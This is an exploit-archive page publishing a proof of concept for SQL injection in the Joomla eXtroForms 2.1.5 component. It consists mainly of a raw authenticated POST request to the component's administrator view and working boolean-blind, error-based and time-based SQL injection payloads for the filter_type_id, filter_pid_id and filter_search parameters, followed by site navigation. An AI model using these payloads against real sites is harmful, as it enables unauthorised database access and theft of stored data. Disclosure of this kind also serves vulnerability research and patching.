Joomla Component eXtroForms 2.1.5 SQL Injection

Joomla Component eXtroForms 2.1.5 SQL Injection: Posted Sep 25, 2018; Authored by Ozkan Mustafa Akkus; Joomla eXtroForms component version 2.1.5 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 3aa17d388a8eb8a88dfda1778a137f9b34b8142e5aa24cbe6f9f9b856cde9a20; Download | Favorite | View

Joomla Component eXtroForms 2.1.5 SQL Injection

# Exploit Title: Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection
# Dork: N/A
# Date: 2018-08-03
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://extro.media/
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/extroforms/
# Version: 2.1.5
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can execute SQL commands through parameters that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize the database or other server informations.
 
# "filter_type_id, filter_pid_id, filter_search" parameters have the same vulnerable.
# Demo: https://demo.extro.media/responsive-joomla-extensions-en/extroforms-demos-en/
# PoC : SQLi :
 
POST /administrator/index.php?option=com_extroform&view=extroformfield
Host: demo.extro.media
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.extro.media/administrator/index.php?option=com_extroform&view=extroformfield
Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5; 48bd4f2f65b6c84d32f8704444f9b24c=rt2t3ur8fgmbjemdqua1vn8u35
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
filter_type_id=1&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
 
# Parameter: filter_type_id (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
 
Payload: filter_type_id=-7022 OR 5787=5787#&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
 
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 
Payload: filter_type_id=1 AND (SELECT 5756 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT (ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
 
Payload: filter_type_id=1 AND SLEEP(5)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1
 
# Parameter: filter_pid_id (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
 
Payload: filter_type_id=1&filter_pid_id=-5547 OR 1857=1857#&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
 
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 
Payload: filter_type_id=1&filter_pid_id=7 AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2680=2680,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
 
Payload: filter_type_id=1&filter_pid_id=7 OR SLEEP(5)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
 
# Parameter: filter_search (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
 
Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND 8748=8748#&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
 
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 
Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND (SELECT 2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zyPZ&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
 
Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND SLEEP(5)-- fDVO&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla Component eXtroForms 2.1.5 SQL Injection

Joomla Component eXtroForms 2.1.5 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Component eXtroForms 2.1.5 SQL Injection

Share This

Joomla Component eXtroForms 2.1.5 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems